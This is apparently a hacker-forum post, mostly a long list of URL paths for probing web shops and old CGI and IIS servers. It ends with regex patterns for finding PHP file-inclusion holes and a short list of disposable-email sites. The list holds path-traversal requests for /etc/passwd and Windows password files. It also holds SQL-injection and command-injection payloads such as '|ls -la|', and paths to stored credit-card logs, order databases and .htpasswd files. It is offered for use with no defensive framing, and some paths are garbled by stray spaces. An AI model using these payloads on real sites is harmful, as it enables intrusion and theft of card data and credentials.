/cgibin/shop/database/metacart.mdb /mail/form.cgi /cgibin /shop/shopping350.mdb /form.cgi /shopping/cgi-bin/cart32.ini /index.cgi?page=../../../../../../../../etc/passwd /cgi-bin/c32web.exe/ShowProgress /vpasp/shopdisplayproducts.asp?cat=qwerty'% 20union%20select%20fldauto /cgibin/orders.txt /cgibin/scripts/shop/shopping350.mdb /form/mail.cgi /cgi-bin/store1b/index.cgi?page=../../../../../../../../etc/passwd /webshop/logs/cc.txt /form/form.cgi /store/index.cgi?page=../../../../../../../../etc/passwd /cgibin/awstats.pl%3Flang%3Dit%26output%3Durldetail /cgibin/%20awstats.pl? /cgi-bin/Form.cgi /vpasp/shopdisplayproducts.asp?cat=admin'%20and%20fldpassword%0li%20ke%20'a%25 /admin.mdb /cgi-bin/cart32.exe/error /cgi/mail.cgi /cgi-bin/c32web.exe/ShowAdminDir /cgi-bin/csql/index.cgi?page=../admin/files/order.log /cgi-bin/admin_files/ /cgi-bin/csql/index.cgi?page=../../../../../../../../etc/passwd /admins.asp /cgi-bin/cart_top /cgi-bin/mail/mail.cgi /shopadmin.asp /cgi-bin/order.log /mailform.pl /cgibin/admin.pl /vpasp/shopdisplayproducts.asp? /policies1.htm /cgi-bin/c32web_old.exe /cgi-bin /c32web.exe /cgi-bin/form/form.cgi /cgibin/metacart.mdb /shopdisplayproducts.asp /cgi-sys/DCShop/orders/orde rs.txt /ccbill6/secure/ /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=3124 &STRMVER=4&CAPREQ=0 /cgi-bin/ibill.log /ccbill6/ /password.txt /cgi-bin /PDG_cart/card /cgibin/www.google.com /honeymoonhideaway.htm+honeymoon+charleston /cgibin/awstats.pl%3Flang%3Dnl /cgibin/admin.pl?setpasswd /cgibin/awstats.pl%3Fyear%3D2003%26month%3D07 /cgibin/awstats.pl%3Fyear%3D2003%26month%3D08 /cgibin/awstats.pl%3Fyear%3D2003%26month%3D09 /cgibin/%20awstats.pl?output=keywords /shop/shopping450.mdb /ccbill6/secure/ccbill.log /cgibin/awstats.pl%3Flang%3Des%26update%3D1 /cgibin/shopper.cgi?search=action&keywords=ccpower%20&template=shopper.conf /cgi-bin/form.cgi /M83A /cgibin/awstats.pl%3Fyear%3D2003%26month%3D11 /cgibin/amadmin.pl?setpasswd /cgi-bin/awstats.pl%3Flang%3Dit /orderdb/database/eipc.mdb /cg-bin//eshop/database/order.mdb /store/database/comersus.mdb /cgibin /password.mdb /~admin/guestbook /cgibin/%20awstats.pl?%20cgibin/%20awstats.pl?output=keywords /cgibin /awstats.pl%3Foutput%3Durldetail%26lang%3Dnl /cgibin/%20awstats.pl?output=keywords /sumthin /cgibin/cgibin/%20awstats.pl?output=keywords /cgi-bin/shopper.cgi?search=action&keywords=ccpower&template=shopper.conf /cgibin/productcart/database/eipc.mdb /cgibin/awstats.pl%3Flang%3Den%26output%3Durldetail /cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dit /cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Dde /mail/mail.cgi /cgibin/shopper.cgi?search=action&keywords=ccpower&template=shopper.conf /cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Dnl /cg/.%20/comersus/database/comersus.mdb /index%20of%20/%20productcart/database/eipc.mdb /scripts/nsiislog.dll /cgibin/order.cgi /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0 /cgi-bin /awstats.pl%3Flang%3Dde /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=3124&STRMVER=4&CAPREQ=0 /cgibinserver/admin_files/commerce_user_lib.pl /cgibin/store/Admin_files/myorderlog.txt //cgibin/orders.txt /cgibin/database/shopping.mdb /cgibin/shopping/shopadmin.asp /cgi-bin/shopper.cgi?preadd=action&key=PROFA&template=order1.log /cgibin/shopper.exe?search=action&keywords=psiber&template=order.log /cgibin/allmanageup.pl /cgi-win/shop.pl/page=;cat%20shop.pl /eshop/database/log.mdb /cgibin /awsta /cgibin/nph-proxy.pl /cgibin/awstats.pl%3Flang%3Dnl%26update%3D1 //config/---.mdb /cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Den /cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Des /cgibin/ccbill/password/.htpasswd /cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D08 /cgibin/awstats.pl%3Flang%3Dde%26output%3Dkeyphrases /eshop/en/database/credit.mdb /cgi-bin /pdg_cart/shopper.conf /password.mdb /data/verotellog.txt /cgibin/awstats.pl%3Foutput%3Durldetail%26update%3D1 /productcart/eipc.mdb /cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D11 /cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Dit /index%20of%20/webshop/templates/cc.txt /cartdb/database/eipc.mdb /cg i-bin/eshop/database/order.mdb /cgibin//fpdb/shopping400.mdb /cgibin/order.txt /cgi-bin/cart32.exe/expdate%20algunas%20veces /cgibin/awstats.pl%3Flang%3Dde%26output%3Dkeywords /cgibin/database/comersus.mdb /cgi-bin/awstats.pl%3Flang%3Des /cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Dfr /globill/ /cgibin/fpdb/shopping400.mdb /cgibin/perl.exe /eshop/en/database/log.mdb /cgibin/shopper.exe?search=action&keywords=psiber&template=orders.log /cg/comersus/database/comersus. mdb /cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D07 /cgibin/awstats.pl%3Flang%3Dnl%26output%3Durldetail /cgibin/admin.mdb /cgi-bin/whereami.cgi?g=ls /cgibin/xxxhu cgibin/cartserver/admin_files/commerce_user_lib.pl /cgibin/%20awstats.pl?output=keywords /cgibin /awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dfr /robot.txt /cgi-bin/form/mail.cgi /ibill/mypins/ /cgi-bin/awstats.pl%3Flang%3Dnl /cgibin/allmanage_admin.pl /cgibin/%20awstats.pl?cgibin/%20awstats.pl?output=keywords /cg-ibin /admin_files/ /cgibin/cart/comersus.mdb /cg-bin/eshop/database/order.mdb /cgibin /htt /cgibin/phf /cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Den /database/eipc.mdb /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=2614&STR MVER=4&CAPREQ=0 /script/shop/shopping350.mdb /cgibin/shopping350.mdb /cg-bin/eshop/en/database/credit.mdb /cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Den /cgi-bin/add-passwd.cgi /logs/200306/charleston.com/ /random_banner/index.cgi?image_list=alternative_image.list&html_file=|ls%20-la| /cgibin/store/log_files/your_order.log /cgibin /shopper.exe?search=action&keywords=psiber&template=neworder.log /cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D09 /cgibin/awstats.pl%3Flang%3Dfr%26update%3D1 /cgibin/awstats.pl%3Foutput%3Dkeywords%26update%3D1 /cgibin /awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dnl /cgibin/awstats.pl%3Flang%3Dde%26output%3Durldetail /cgibin/mailform.pl /cgibin/awstats.pl%3Flang%3Des%26output%3Dkeywords /cgi-bin/shop/shopping350.mdb /cgibin/cart/database/comersus.mdb /dbase/date. /www.gambling-01.co.uk/cgibin/password.txt /cgibin/awstats.pl%3Flang%3Des /ccbill/ccbill.log /cgibin/awstats.pl%3Flang%3Dnl%26output%3Dkeywords /cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dde /productcart/pc/Custvb.asp?redirectUrl=&Email=%27+having+1%3D1--&_email=email&password=asd&_password=required&Submit.x=33&Sub mit.y=5&Submit=Submit /cgibin/index%20of /cgi-bin/form1.cgi /cc.txt /cgibin/awstats.pl%3Flang%3Den%26update%3D1 /cg/./comersus/database/comersus.mdb /cgi-bin/awstats.pl%3Foutput%3Dkeyphrases /cgibin /webshop/templates/cc.txt /....../ all /....../config.sys /....../etc/hosts /../../../../ all /../../../../../../../boot.ini /../../../../../winnt/repair/sam._ /../../../../config.sys /../../../../etc/hosts /.access /.bash_history /.htacc ess /.html/............./config.sys /.htpasswd /.passwd /ASPSamp/AdvWorks/equipment/catalog_type.asp /Admin_files/order.log /AdvWorks/equipment/catalog_type.asp /Orders/order.log /PDG_Cart/order.log /PDG_Ca rt/shopper.conf /PSUser/PSCOErrPage.htm /WebShop/logs/cc.txt /WebShop/logs/ck. log /WebShop/templates/cc.txt /_private /_vti_bin/_vti_aut/dvwssr.dll /_vti_bin /fpcount.exe /_vti_inf.html /_vti_pvt /_vti_pvt/administrators.pwd /_vti_pvt/authors.pwd /_vti_pvt/service.pwd /_vti_ pvt/shtml.dll /_vti_pvt/shtml.exe /_vti_pvt/users.pwd /adsamples /config/site.csc /bin /carbo.dll /ccbill/secure/ccbill.log /cfdocs/cfmlsyntaxcheck.cfm /---/docs/sourcewindow.cfm /---/email/getfile.cfm?filename=c:boot.ini /---/displayopenedfile.cfm /---/exprcalc.cfm /---/openfile.cfm /---/sendmail.cfm /cfdocs/snippets/fileexists.cfm /cfdocs/snippets/viewexample.cfm /cgi /cgi-bin /cgi-bin/AT-admin.cgi /cgi-bin/AT-generate.cgi /cgi-bin/Admin_files/order.log /cgi-bin/AnyForm2 /cgi-bin/Cgitest.exe /cgi-bin/Count.cgi /cgi-bin/FormHandler.cgi /cgi-bin/GW5/GWWEB.EXE /cgi-bin/UltraBoard.cgi /cgi-bin /UltraBoard.pl /cgi-bin/add_ftp.cgi /cgi-bin/adp /cgi-bin/adpassword.txt /cgi-bin /ads.setup /cgi-bin/aglimpse /cgi-bin/alibaba.pl /cgi-bin/allmanage.pl /cgi-bin/allmanage/adp /cgi-bin/allmanage/k /cgi-bin/allmanage/settings.cfg /cgi-bin/allmanage/userfile.dat /cgi-bin/allmanageup.pl /cgi-bin/anyboard.cgi /cgi-bin/architext_query.pl /cgi-bin/authorize/dbmfiles/users /cgi-bin /ax-admin.cgi /cgi-bin/ax.cgi /cgi-bin/bigconf.cgi all /cgi-bin/bizdb1-search.cgi /cgi-bin/bnbform.cgi /cgi-bin/cachemgr.cgi /cgi-bin/calender.pl /cgi-bin/calender_admin.pl /cgi-bin/campas /cgi-bin/cart.pl /cgi-bin/cgiwrap /cgi-bin /classifieds.cgi /cgi-bin/clickresponder.pl /cgi-bin/cmd.exe /cgi-bin/counterfiglet /cgi-bin/dbmlparser.exe /cgi-bin/dig.cgi /cgi-bin/dnewsweb /cgi-bin/edit.pl /cgi-bin/environ.cgi /cgi-bin/excite /cgi-bin/faxsurvey /cgi-bin/filemail.pl /cgi-bin /files.pl /cgi-bin/finger /cgi-bin/finger.pl /cgi-bin/formmail.pl /cgi-bin/fpcount.exe /cgi-bin/fpexplore.exe /cgi-bin/gH.cgi /cgi-bin/get32.exe /cgi-bin /glimpse /cgi-bin/guestbook.cgi /cgi-bin/handler /cgi-bin/htimage.exe /cgi-bin/htmlscript /cgi-bin/htsearch /cgi-bin /htsearch /cgi-bin/iisadmpwd/achg.htr /cgi-bin/iisadmpwd/aexp.htr /cgi-bin /iisadmpwd/aexp2.htr /cgi-bin/iisadmpwd/anot.htr /cgi-bin/imagemap.exe /cgi-bin/info2www /cgi-bin/infosrch.cgi /cgi-bin/input.bat /cgi-bin/input2.bat /cgi-bin/jj /cgi-bin/k /cgi-bin/loadpage.cgi /cgi-bin /mailform.exe /cgi-bin/maillist.pl /cgi-bin/makechanges/easysteps/easysteps.pl /cgi-bin/man.sh /cgi-bin/netstat /cgi-bin/nph-publish /cgi-bin/nph-test-cgi /cgi-bin/passwd /cgi-bin/passwd.txt /cgi-bin/perl.exe /cgi-bin /perlshop.cgi /cgi-bin/pfdispaly.cgi /cgi-bin/pfdisplay /cgi-bin /pfdisplay.cgi /cgi-bin/phf /cgi-bin/php.cgi /cgi-bin/plusmail /cgi-bin /postcard.pl /cgi-bin/printenv /cgi-bin/process_bug.cgi /cgi-bin/query /cgi-bin/responder /cgi-bin/rguest.exe /cgi-bin/rpm_query /cgi-bin/rwwwshell.pl /cgi-bin /search.cgi /cgi-bin/settings.cfg /cgi-bin/sojourn /cgi-bin/survey.cgi /cgi-bin/test-cgi /cgi-bin/test.bat /cgi-bin /textcounter.pl /cgi-bin/tpgnrock /cgi-bin/tst.bat /cgi-bin/tst.bat /cgi-bin/unlg1.1 Finding PHP Vulnerabilities With Google Code Search RFI: include\(\$ include_once\(\$ require_once\(\$ require\(\$ include\(\$_GET include_once\(\$_GET require_once\(\$_GET require\(\$_GET include\(\$_POST include\(\$_POST include\(\$_POST include\(\$_POST include\(\$HTTP_POST_VARS require\(\$HTTP_POST_VARS include_once\(\$HTTP_POST_VARS require_once\(\$HTTP_POST_VARS include\(\$HTTP_GET_VARS require\(\$HTTP_GET_VARS include_once\(\$HTTP_GET_VARS require_once\(\$HTTP_GET_VARS

How to Create Mail in 5 second

http://www.bspamfree.org/
http://www.yopmail.com/
http://dodgeit.com/
http://www.spam.la/


just fill username u got email

from CA.com